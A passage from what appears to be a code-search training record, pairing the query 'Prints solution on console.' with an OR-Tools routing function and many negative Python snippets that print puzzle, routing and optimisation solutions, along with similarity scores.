ValueError('type must be ssd or faster_rcnn string')\n\n if iou_threshold < 0 or iou_threshold > 1.0:\n raise ValueError('iou_threshold not in [0, 1.0].')\n if max_detections_per_class > max_total_detections:\n raise ValueError('max_detections_per_class should be no greater than '\n 'max_total_detections.')\n\n non_max_suppressor_fn = functools.partial(\n post_processing.batch_multiclass_non_max_suppression,\n score_thresh=score_threshold,\n iou_thresh=iou_threshold,\n max_size_per_class=max_detections_per_class,\n max_total_size=max_total_detections)\n\n return non_max_suppressor_fn" ]
[ "0.6450392", "0.6399377", "0.63585526", "0.62900907", "0.6012756", "0.59775937", "0.5947511", "0.59247243", "0.5893758", "0.5858456", "0.5848734", "0.5842272", "0.58085376", "0.5727631", "0.56761247", "0.56608504", "0.56291807", "0.5626758", "0.56165975", "0.56113476", "0.56099415", "0.5601553", "0.5590548", "0.55753726", "0.55665565", "0.5565887", "0.55655324", "0.5555759", "0.55383277", "0.5535476", "0.55118203", "0.55088353", "0.5493719", "0.5489097", "0.5486215", "0.5479626", "0.5475961", "0.54757345", "0.54732305", "0.5459962", "0.5448163", "0.5443252", "0.5441131", "0.54261273", "0.5416684", "0.54090184", "0.5405048", "0.54014033", "0.54008985", "0.5392119", "0.5391371", "0.5389246", "0.5387092", "0.5375332", "0.5373596", "0.5364894", "0.53614146", "0.5358748", "0.5354525", "0.5350904", "0.53485876", "0.5347681", "0.5347623", "0.5334418", "0.5333468", "0.5333301", "0.533124", "0.53249675", "0.5324658", "0.53122807", "0.5308454", "0.53060913", "0.5304197", "0.5294077", "0.52917635", "0.52789366", "0.5278676", "0.5277198", "0.52733207", "0.52691436", "0.5264561", "0.5264561", "0.5259098", "0.52465713", "0.5244542", "0.52436376", "0.5236917", "0.5233592", "0.5225037", "0.52243775", "0.5217614", "0.52126867", "0.5212467", "0.52076566", "0.52044755", "0.5196176", "0.5192419", "0.51916116", "0.51904017", "0.51897836" ]
0.6306293
3
Prints solution on console.
def print_solution(data, manager, routing, solution): time_dimension = routing.GetDimensionOrDie('Time') total_time = 0 for vehicle_id in range(data['num_vehicles']): index = routing.Start(vehicle_id) plan_output = 'Route for vehicle {}:\n'.format(vehicle_id) while not routing.IsEnd(index): time_var = time_dimension.CumulVar(index) plan_output += '{0} Time({1},{2}) -> '.format( manager.IndexToNode(index), solution.Min(time_var), solution.Max(time_var)) index = solution.Value(routing.NextVar(index)) time_var = time_dimension.CumulVar(index) plan_output += '{0} Time({1},{2})\n'.format(manager.IndexToNode(index), solution.Min(time_var), solution.Max(time_var)) plan_output += 'Time of the route: {}min\n'.format( solution.Min(time_var)) print(plan_output) total_time += solution.Min(time_var) print('Total time of all routes: {}min'.format(total_time))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_solution():\n pass", "def solve(self):\n print(\"Problem %s Answer: %s\" % (self.number, self.solution()))", "def printSolution(self):\n print \"----- Solution -----\"\n for feature in self.features:\n print \"Name = \" + feature.name + \" Value = \" + str(feature.value)", "def print_result(solution, states_expanded, max_fringe):\n if solution is None: \n print(\"No solution found.\")\n else: \n print(\"Solution has {} actions.\".format(len(solution)))\n print(\"Total states expanded: {}.\".format(states_expanded))\n print(\"Max fringe size: {}.\".format(max_fringe))", "def print_solution(self, solution_path):\n print(\"---SOLUTION---: \")\n for node in solution_path:\n node.state.plot_cube(\n \"SOLUTION: Node [\" + str(node.id) + \"] at depth \" + str(node.node_depth)\n )\n if node.last_action != None:\n print(\"Next action: \", node.last_action)\n print(\"[\" + str(node.id) + \"] \" + str(node.state.create_md5()))\n\n print(\"\\n TOTAL COST: \", solution_path[len(solution_path) - 1].cost)", "def PrintSolution(self):\n sol = \"\"\n charMap = {\n Magnets.EMPTY: '.',\n Magnets.PLUS: '+',\n Magnets.MINUS: '-',\n }\n for row in self.Solution():\n for space in row:\n sol = sol + charMap.get(space, '?')\n sol = sol + '\\n'\n return sol", "def print_out():\n pass", "def print_solution(solution_list) -> 'Human Readable Solution':\n\tsize = len(solution_list[0][0])\n\ttry:\n\t\tprint('Starting Node'.center(20, ' '))\n\t\tprint(''.center(20, '-'))\n\t\tfor node in solution_list:\n\t\t\t\tfor i in range(size):\n\t\t\t\t\tprint(str(node[i]).center(20, ' '))\n\t\t\t\tprint(''.center(20, '-'))\n\t\tprint('Goal Node'.center(20, ' '))\n\texcept Exception as error_msg:\n\t\tprint(\"No solution found!\")", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def main() -> None:\n with open(f'{os.path.dirname(__file__)}/input.txt', 'r') as input_file:\n for solution in solve(input_file):\n print(solution)", "def print_solution(self):\n solution_list = [self._board[99]]\n while solution_list[0].previous_square:\n solution_list.insert(0, solution_list[0].previous_square)\n\n for spot in solution_list:\n print(spot)", "def mystery_solved():\n print(\"\\nThe butler: The mystery is solved! I knew it was someone in the family. Well done!\")", "def show_solution(self,show):\r\n self.showSolution = show", "def print_problem(self):\n print('\\n*****************')\n print('PROBLEM: ' + self.problem)\n print('OBJECTS: ' + str(self.objects))\n print('INIT: ' + str(self.init))\n print('GOAL: ' + str(self.goal))\n print('AGENTS: ' + str(self.agents))\n print('****************')", "def printSolutions(self):\n\t\tprint \"Computing solutions...\"\n\t\t\n\t\tsolutions = self.problem.getSolutions()\n\t\tnumberOfSolutions = len(solutions)\n\t\t\n\t\tfor i, solution in enumerate(solutions):\n\t\t\titems = solution.items()\n\t\t\t# sort by time\n\t\t\titems.sort(lambda a, b: cmp(a[1], b[1]))\n\t\t\t# sort by order\n\t\t\titems.sort(lambda a, b: cmp(a[0][0], b[0][0]))\n\t\t\t\n\t\t\tprint \"Solution number\", i + 1\n\t\t\t\n\t\t\ti = 1\n\t\t\tfor j in items:\n\t\t\t\tif j[0][0:1] != str(i):\n\t\t\t\t\tif \"enter\" in j[0] or \"finish\" in j[0]:\n\t\t\t\t\t\tprint j,\n\t\t\t\telse:\n\t\t\t\t\tprint \"\\n\",\n\t\t\t\t\tprint \"Order no:\", i\n\t\t\t\t\tif \"enter\" in j[0] or \"finish\" in j[0]:\n\t\t\t\t\t\tprint j,\n\t\t\t\t\ti += 1\n\t\t\tprint \"\\n==============================================\\n\",\n\t\tprint \"Number of solutions:\", numberOfSolutions\n\t\treturn solutions, numberOfSolutions", "def print_solution(self, solution):\n if self._background is None:\n bg_weights = solution[0 : self.nprimaries]\n mod_weights = solution[self.nprimaries : self.nprimaries * 2]\n else:\n bg_weights = self._background\n mod_weights = solution\n\n print(f\"Background spectrum: {self.w2s(bg_weights)}\")\n print(f\"Modulation spectrum: {self.w2s(mod_weights)}\")", "def print_solution(manager, routing, assignment):\n print('Objective: {}'.format(assignment.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(index)\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Objective: {}m\\n'.format(route_distance)", "def print_solution(manager, routing, solution):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Route distance: {}miles\\n'.format(route_distance)", "def print_solution():\n natural = 188\n if is_natural(natural):\n combination = lagrange(int(natural))\n print(f\"{natural} =\", end='')\n for i, value in enumerate(combination):\n print(f\" {value}^2({value ** 2})\",\n \"\" if len(combination) == i+1 else \"+\", end='')\n else:\n print(\"Invalid input. Please write correct natural number\")", "def print_solution(manager, routing, assignment):\n print('Objective: {}'.format(assignment.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Objective: {}m\\n'.format(route_distance)", "def print_results(self):\n pass", "def print_solution(\n solution: list[tuple[int, ...]], time_complexity: int, size_complexity: int\n) -> None:\n print(\"\\033[32;1m🎉 The puzzle was solved 🎉\\033[m\")\n print(\n f\"\\033[35;1m{len(solution)-1:,} moves\\033[m were necessary to get to the solution:\"\n )\n for move in solution:\n print(f\"\\t{move}\")\n print(\n f\"\"\"Time complexity = \\033[33;1m{time_complexity\n :,}\\033[m | Size complexity = \\033[33;1m{size_complexity:,}\\033[m\"\"\"\n )", "def printOutput(self):\n pass", "def display_results(_results, model):\n print(\"Optimal solution:\\n\")\n for website in sorted(model.Websites):\n for item in sorted(model.Items):\n if model.Quantity[website, item].value > 0:\n print(\"Buy {q} item(s) of {i} from {w}\".format(q=int(model.Quantity[website, item].value),\n i=item,\n w=website,))\n\n print('')\n print(\"Shipping Cost = {}\".format(model.Cost['Shipping'].value))\n print(\"Product Cost = {}\".format(model.Cost['Item'].value))\n print('')\n\n for i in _results['Solution']:\n print(\"Total Cost = {}\".format(i['Objective']['Objective']['Value']))", "def print_results(self) -> None:\n print(\"=\" * 70, file=sys.stderr)\n total = 0.0\n max_points = 0.0\n for problem in self.problems:\n total += problem.run_tests()\n max_points += problem.max_grade\n print(f\"Total Grade: {total}/{max_points}\", file=sys.stderr)", "def print_solution(manager, routing, solution):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n print(plan_output)\n plan_output += 'Route distance: {}miles\\n'.format(route_distance)", "def print_solution(data, manager, routing, solution):\n # create a file in order to save the solution steps.\n sol_fpath = gbo.create_results_name()\n print(f'Objective: {solution.ObjectiveValue()}')\n max_route_distance = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n gbo.write_solution_to_file(sol_fpath, plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the route distances: {}m'.format(max_route_distance))\n gbo.write_solution_to_file(sol_fpath, \"route distance: \"+str(max_route_distance))", "def print_solution(self):\n print(f'Objective: {self.solution.ObjectiveValue()}')\n total_distance = 0\n total_load = 0\n max_route_distance = 0\n for vehicle_id in range(self.data['num_vehicles']):\n index = self.routingManager.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n route_load = 0\n while not self.routingManager.IsEnd(index):\n node_index = self.manager.IndexToNode(index)\n route_load += self.data['demands'][node_index]\n plan_output += ' {0} Load({1}) -> '.format(self.data['names'][node_index], route_load)\n\n previous_index = index\n index = self.solution.Value(self.routingManager.NextVar(index))\n route_distance += self.routingManager.GetArcCostForVehicle(\n previous_index, index, vehicle_id\n )\n print(route_distance)\n\n plan_output += '{0}, Load({1}) \\n '.format(self.data['names'][self.manager.IndexToNode(index)], route_load)\n\n plan_output += 'Distance of the route: {}\\n'.format(route_distance)\n plan_output += 'Load of the route: {}\\n'.format(route_load)\n\n print(plan_output)\n total_distance += route_distance\n total_load += route_load\n\n print('Total distance of all routes: {}km'.format(total_distance))\n print('Total load of all routes: {}'.format(total_load))", "def print_solution(manager, routing, solution, dima):\n print('Objective: {} miles'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n plan_output = 'Route for vehicle 0:\\n'\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} ->'.format(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n plan_output += ' {}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Route distance: {} miles\\n'.format(route_distance)\n print(plan_output)", "def test_print_solo(self):\n response = support.create_project(self, 'minneapolis')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n print_string = string.ascii_lowercase\n\n code = '\\n'.join([\n 'values = [x ** 2 for x in range(100)]',\n 'print(\"{}\")'.format(print_string)\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(print_string),\n 2,\n 'should have printed ascii lowercase'\n )", "def _debug_print_soln(self, m):\n print('*'*80)\n print('DEBUGG solution:')\n print(' objective value:', m.obj())\n for c, comp in enumerate(m.Components):\n name = comp.name\n print(' component:', c, name)\n for res, r in m.resource_index_map[comp].items():\n print(' resource:', r, res)\n for t, time_index in enumerate(m.T):\n prod = getattr(m, '{n}_production'.format(n=name))\n print(' time:', t, time_index, prod[r, time_index].value)\n print('*'*80)", "def test_print_result(capsys):\n assert \"\"\"Total 5 hands solved\nTotal 4 hands solved with hint\nTotal 4 hands failed to solve\"\"\" in hl.test_help_print_result(capsys)", "def target_found( self ):\n print( \"Solution: \" + self.path );", "def generateSolution(self, cont):\n solnf = self.outdir + \"/tracks_soln.csv\"\n old = os.dup(1)\n sys.stdout.flush()\n os.close(1)\n os.open(solnf, os.O_WRONLY | os.O_CREAT)\n cont.printallSolutions(yetkin=self.yetkin)\n sys.stdout.flush()\n os.close(1)\n os.dup(old)\n os.close(old)", "def display_problem():\n return \"\\nFind the difference between the sum of the squares of the first one hundred natural numbers and the \" \\\n \"square of the sum.\\n\"", "def print_outcome(self) -> None:\n pass", "def print_output(self):\n print(\"Reference score: \" + str(self.PotTax_reference.sum().TFI))\n print(\"Intervention score: \" + str(self.PotTax_intervention.sum().TFI))\n return", "def main():\n data = read_data()\n print('Part one solution: {}'.format(part_one(data)))\n print('Part two solution: {}'.format(part_two(data)))", "def print_report(self):\n\n if not self._translation:\n print('Failed to translate ciphertext.')\n return\n\n plaintext = self.ciphertext.translate(\n SubSolver._make_trans_from_dict(self._translation))\n print('Ciphertext:')\n print(self.ciphertext, '\\n')\n print('Plaintext:')\n print(plaintext, '\\n')\n\n print('Substitutions:')\n items = [key + ' -> ' + word for key, word\n in self._translation.items()]\n items.sort()\n i = 0\n for item in items:\n print(item + ' ', end='')\n if i % 5 == 4:\n print('')\n i += 1", "def main():\n cli = Cli()\n res = cli.run()\n if res:\n print(res.strip())", "def main(args):\n # Results: print to console and also write to output file\n pass", "def SolveAndPrint(self, model, decisions, constraints):\n\t\tself.root = Toplevel()\n\t\tmenubar = Menu(self.root)\n\t\ttext=Text(self.root)\n\t\t\n\t\tfilemenu=Menu(menubar, tearoff=0)\n\t\tfilemenu.add_command(label=\"Save As...\", \n\t\t\t\t\tcommand=(lambda text=text: file_save(text)), \n\t\t\t\t\taccelerator=\"Ctrl+Shift+S\")\n\n\t\tfilemenu.add_command(label=\"Reload Module\", command=(lambda: reload(simplex_class)), accelerator=\"Ctrl+T\")\n\n\t\tfilemenu.add_command(label=\"Close\", \n\t\t\t\t\tcommand=donothing, \n\t\t\t\t\taccelerator=\"Ctrl+w\") #come back to this\n\t\tfilemenu.add_separator()\n\t\tfilemenu.add_command(label=\"Exit\", command=self.root.quit)\n\n\t\tmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n\t\thelpmenu = Menu(menubar, tearoff=0)\n\t\thelpmenu.add_command(label=\"Help\", command=donothing) #come back to this\n\t\ttext.insert(END, \n\t\t\t\t\"\\nNumber of variables = %d\\n\"%(model.NumVariables()))\n\n\t\tprint (\"Number of variables = %d\"%(model.NumVariables()))\n\t\tprint (\"Number of constraints = %d\"%(model.NumConstraints()))\n\n\t\ttext.insert(END, \"\\nNumber of constraints = %d\\n\"%(model.NumConstraints()))\n\t\t\n\t\tresult_status = model.Solve()\n\n\t\ttext.insert(END, \"\\nsolve output = %s\"%(result_status))\n\n\t\tassert model.VerifySolution(1e-7, True), \"model is not verifiable\" # % equivalent to infeasibility\n\n\t\tassert result_status == pywraplp.Solver.OPTIMAL, \"not an optimal solution present\" #The problem has an optimal solution\n\n\t\ttext.insert(END, \"\\nProblem solved in %f ms \\n\"%(model.wall_time()))\n\n\t\tprint (\"\\nProblem solved in %f milliseconds \\n\" %(model.wall_time()))\n\n\t\ttext.insert(END, \"\\nOptimal objective value = %f \\n\" %(model.Objective().Value())) #The objective value of the solution `no reduced costs`\n\t\tprint (\"\\nOptimal objective value = %f\\n\" %(model.Objective().Value()))\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n%s = %f\\n\"%(variable.name(), variable.solution_value()))\n\t\t\tprint (\"%s = %f\" %(variable.name(), variable.solution_value()))\n\n\t\ttext.insert(END, \"\\n \\nAdvanced Usage: \\n\")\n\t\tprint (\"\\n \\nAdvanced Stats: \\n\")\n\t\ttext.insert(END, \"\\n \\nProblem Solved in %d iterations\"%model.iterations())\n\t\tprint (\"\\n \\n Problem solved in %d iterations\" %model.iterations())\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n \\n%s: reduced cost = %f\" %(variable.name(), \n\t\t\t\t\t\t\t\t\tvariable.reduced_cost()))\n\t\t\tprint (\"%s: reduced cost = %f\" %(variable.name(), variable.reduced_cost()))\n\n\t\tactivities = model.ComputeConstraintActivities() #printout of RHS = `b` in AX = b\n\n\t\tfor i, constraint in enumerate(constraints):\n\t\n\t\t\tprint(dir(constraint))\n\t\t\ttext.insert(END, \n\t\t\t\t\"\\n\\n constraint %s: dual value = %f\\n activity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(), \n\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\n\t\t\tprint (\"constraint %s: dual value = %f\\nactivity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(),\n\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\t\t\ttext.insert(END, \n\t\t\t\t\t\"\\n \\n constraint %s Lower to Upper Boundary:\\n \\t %f < %.2d < %f\" %(constraint.name(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Ub()))\n\n\t\t\tprint (\"constraint %s Lower.....to.....Upper Boundary: %f < %.2d < %f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t\tconstraint.Ub()))\n\t\ttext.config(state=DISABLED)\n\t\ttext.pack()\n\t\tself.root.config(menu=menubar)", "def answer():\n print(\"\\nJetzt befindest du dich in einer wunderschönen Welt, doch du stellst fest das es verschiedene Wege gibt. Du bemerkst sofort, dass es Im rechten dagegen hat es sehr viel Wasser mit Krokodile hat, der linke Weg dagegen sieht wunderschön aus!\")", "def _do_outputs(self):\n self._puzzle.display_revealed_puzzle()\n hint = self._puzzle.get_hint()\n self._console.write(hint)\n print(\"\")\n self._jumper.draw_jumper()\n print(\"\")\n\n # These ifs end the game\n if self._puzzle.is_solved():\n self._keep_playing = False\n self._puzzle.display_win_screen()\n \n if self._puzzle.incorrect_guesses >= 4:\n self._keep_playing = False\n self._puzzle.display_loss_screen()", "def test_get_solution(self):\n pass", "def phrase_output(self, phrase):\n Phrase(self.selected_phrase, self.player_guess, False, False)\n print('{}'.format(''.join(self.consol_output)))", "def main():\r\n print(\"JoJo\")", "def show_result():\n print(\"I win!!\")", "def print_solution_position(solution: str, puzzle: str) -> None:\r\n print(\r\n \"Solution:\\n{}\\n\\nCurrent position:\\n{}\\n\".format(\r\n generate_grid(solution), generate_grid(puzzle)\r\n )\r\n )", "def display():\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # Call the write method with sys.stdout as the file.\n write(file=sys.stdout)", "def main():\n parser = argparse.ArgumentParser(\n description=\"Returns back the entire solution graph.\")\n parser.add_argument(\"-M\", \"--master\", type=str, default=\"local[8]\",\n help=\"url of the master for this job\")\n parser.add_argument(\"-O\", \"--output\", type=str, default=\"solution-out\",\n help=\"name of the output file\")\n parser.add_argument(\"-H\", \"--height\", type=int, default=2,\n help=\"height of the puzzle\")\n parser.add_argument(\"-W\", \"--width\", type=int, default=2,\n help=\"width of the puzzle\")\n args = parser.parse_args()\n\n\n # open file for writing and create a writer function\n output_file = open(args.output, \"w\")\n writer = lambda line: output_file.write(line + \"\\n\")\n\n # call the puzzle solver\n solve_sliding_puzzle(args.master, writer, args.height, args.width)\n\n # close the output file\n output_file.close()", "def main():\n # output filename\n param = read_parameters('Kanki01_input.yaml')\n s = seal(param)\n s.solve_zeroth()\n s.plot_res()", "def printhelp():", "def print_results(self):\n for test_cases in self._tests:\n for test_case in test_cases:\n print('{} ...ok'.format(test_case.get_name()))\n return 0", "def show_main_screen():\n option = algo_selection(algos)\n if option == 1:\n print_factorial()\n show_main_screen()\n if option == 2:\n print_gcd()\n show_main_screen()\n if option == 3:\n print_pow()\n show_main_screen()\n if option == 4:\n print_towers()\n show_main_screen()\n if option == 5:\n print_permutations()\n show_main_screen()\n if option == 6:\n raise SystemExit(0)", "def __str__(self):\n return f'{self.text}: {self.chs}, correct answer: {self.solution}'", "def print_solution(data, manager, routing, assignment):\n total_distance = 0\n total_load = 0\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n route_load = 0\n while not routing.IsEnd(index):\n node_index = manager.IndexToNode(index)\n route_load += data['demands'][node_index]\n plan_output += ' {0} Load({1}) -> '.format(node_index, route_load)\n previous_index = index\n index = assignment.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += ' {0} Load({1})\\n'.format(manager.IndexToNode(index),\n route_load)\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n plan_output += 'Load of the route: {}\\n'.format(route_load)\n # print(plan_output)\n total_distance += route_distance\n total_load += route_load\n with open(f\"Survey/vrp-nanostores/vrp-nanostores/food_deserts/outputs/2-e/clust8/route/route_vehicle{vehicle_id}.txt\", \"w\") as file:\n file.write(plan_output)\n file.close()\n print(\"aaa\")\n print('Total cost for all routes: {}m'.format(total_distance))\n print('Total load of all routes: {}'.format(total_load))\n with open(f\"Survey/vrp-nanostores/vrp-nanostores/food_deserts/outputs/2-e/clust8/load_dist_{data['num_vehicles']}vehicles.txt\", \"w\") as file:\n out_file = \"\"\n out_file += str(total_load) + \",\" + str(total_distance)\n file.write(out_file)\n file.close() # OPEN AND ANALYZE LATER WITH PANDAS", "def cli(argv):\r\n args = get_args(argv)\r\n verbosity = \"summary\"\r\n if args.verbose:\r\n verbosity = \"report\"\r\n report = evaluate(args.design, verbosity)\r\n print json.dumps(report, indent=4)", "def SolveAndPrint(self, model, decisions, constraints, solver_type):\n\t\ttry:\n\t\t\tresult_status = model.Solve()\n\t\t\tassert result_status == pywraplp.Solver.OPTIMAL #The problem has an optimal solution\n\t\t\tassert model.VerifySolution(1e-7, True)\n\t\t\tprint (\"Success\")\n\n\t\texcept AssertionError:\n\t\t\tresult_status = 3\n\t\t\tprint('linear problem is not sovable/infeasible for %s method'%(solver_type))\n\t\t\ttkMessageBox.showerror('infeasible', message='Problem is infeasible, no x* node for %s'%(solver_type))\n\t\t\tif solver_type == 'clp':\n\t\t\t\treturn self.optimization_problem(2,\n\t\t\t\t\t\t\t\t self.variables,\n\t\t\t\t\t\t\t\t self.constraints,\n\t\t\t\t\t\t\t\t self.type,\n\t\t\t\t\t\t\t\t self.objective,\n\t\t\t\t\t\t\t\t 'glop')\n\t\t\telse:\n\n\t\t\t\tprint('an error has occured, please review data')\n\t\t\t\ttkMessageBox.showerror('an error has occured, please review data')\n\t\t\t\treturn\t\n\n\t\tfinally:\n\t\t\tpass\n\n\t\t######## SOLUTION IS OPTIMAL ######\n\t\tself.root = Toplevel()\n\t\tmenubar = Menu(self.root)\n\t\ttext=Text(self.root)\n\t\n\t\tfilemenu=Menu(menubar, tearoff=0)\n\t\tfilemenu.add_command(label=\"Save As...\", \n\t\t\t\t\tcommand=(lambda text=text: file_save(text)), \n\t\t\t\t\taccelerator=\"Ctrl+Shift+S\")\n\n\t\tfilemenu.add_command(label=\"Reload Module\", \n\t\t\t\t\tcommand=(lambda: reload(simplex_class)), \n\t\t\t\t\taccelerator=\"Ctrl+T\")\n\n\t\tfilemenu.add_command(label=\"Close\", \n\t\t\t\t\tcommand=(lambda: checkwork(self.root, text)), \n\t\t\t\t\taccelerator=\"Ctrl+w\") #come back to this\n\t\tfilemenu.add_separator()\n\t\tfilemenu.add_command(label=\"Exit\", command=(lambda: checkwork(self.root, text)))\n\n\t\tmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n\t\thelpmenu = Menu(menubar, tearoff=0)\n\t\thelpmenu.add_command(label=\"Help\", command=donothing) #come back to this\n\n\n\t\t################### STATS ########################\n\t\ttext.insert(END, \"\\n ___%s___ \\n\" %(self.title.upper()))\n\n\t\ttext.insert(END, \"\\nsolve output = %s\"%(result_status))\n\t\tprint(\"\\n\\nsolve output = %d\"%(result_status))\n\n\t\ttext.insert(END, \n\t\t\t\t\"\\nNumber of variables = %d\\n\"%(model.NumVariables()))\n\n\t\tprint (\"Number of variables = %d\"%(model.NumVariables()))\n\t\tprint (\"Number of constraints = %d\"%(model.NumConstraints()))\n\n\t\ttext.insert(END, \"\\nNumber of constraints = %d\\n\"%(model.NumConstraints()))\n\t\t\n\n\t\ttext.insert(END, \"\\nProblem solved in %f ms \\n\"%(model.wall_time()))\n\n\t\tprint (\"\\nProblem solved in %f milliseconds \\n\" %(model.wall_time()))\n\n\t\ttext.insert(END, \"\\nOptimal objective value = %f \\n\" %(model.Objective().Value())) #The objective value of the solution `no reduced costs`\n\t\tprint (\"\\nOptimal objective value = %f\\n\" %(model.Objective().Value()))\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n%s = %f\\n\"%(variable.name(), variable.solution_value()))\n\t\t\tprint (\"%s = %f\" %(variable.name(), variable.solution_value()))\n\n\t\ttext.insert(END, \"\\n \\nAdvanced Stats: \\n\")\n\t\tprint (\"\\n \\nAdvanced Stats: \\n\")\n\t\ttext.insert(END, \"\\n \\nProblem Solved in %d iterations\"%model.iterations())\n\t\tprint (\"\\n \\n Problem solved in %d iterations\" %model.iterations())\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n \\n%s: reduced cost = %f\" %(variable.name(), \n\t\t\t\t\t\t\t\t\tvariable.reduced_cost()))\n\t\t\tprint (\"%s: reduced cost = %f\" %(variable.name(), variable.reduced_cost()))\n\n\t\tactivities = model.ComputeConstraintActivities() #printout of RHS = `b` in AX = b\n\n\t\tfor i, constraint in enumerate(constraints):\n\t\t\ttext.insert(END, \n\t\t\t\t\"\\n\\nconstraint %s: \\ndual value = %f\\n activity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(), \n\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\n\t\t\tprint (\"constraint %s: dual value = %f\\nactivity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(),\n\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\t\t\ttext.insert(END, \n\t\t\t\t\t\"\\nLower to Upper Boundary:\\n \\t %f < %.2d < %f\" %(constraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t activities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t constraint.Ub()))\n\n\t\t\tprint (\"\\nLower.....to.....Upper Boundary:\\n\\t %f < %.2d < %f\" %(constraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t activities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t constraint.Ub()))\n\n\t\t\tprint(\"\\nSLACK/SURPLUS status:\\n\\t %s\"%(constraint.basis_status()))\n\n\t\t\ttext.insert(END,\n\t\t\t\t\t\"\\nSLACK/SURPLUS status:\\n\\t %s\"%(constraint.basis_status()))\n\t\ttext.config(state=DISABLED)\n\t\ttext.pack()\n\t\tself.root.config(menu=menubar)", "def test_print_end(self):\n response = support.create_project(self, 'madison')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n print_string = string.ascii_lowercase\n\n code = '\\n'.join([\n 'import cauldron as cd',\n 'cd.display.text(\"Hello World\")',\n 'print(\"{}\")'.format(print_string)\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n 